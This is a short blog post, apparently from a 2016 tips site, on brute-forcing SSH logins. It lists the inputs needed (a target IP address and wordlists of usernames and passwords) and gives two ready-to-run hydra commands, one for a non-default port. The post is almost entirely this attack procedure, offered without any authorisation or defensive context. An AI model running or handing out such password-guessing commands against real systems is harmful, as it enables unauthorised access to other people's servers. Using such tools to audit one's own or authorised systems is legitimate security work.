Wireless Army
This is a blog / tips and tricks website for web developers and security researchers.
follow us in feedly


brutforce ssh
by admin
 at 2016-06-01 17:07:00.

3 things that you will need:

  • the ssh ip address
  • a wordlist of possible usernames
  • a wordlist of possible passwords

 

hydra -L user.txt -P pass.txt ip ssh

or if it's running on a different port do:
hydra -s 44 -L user.txt -P pass.txt ip ssh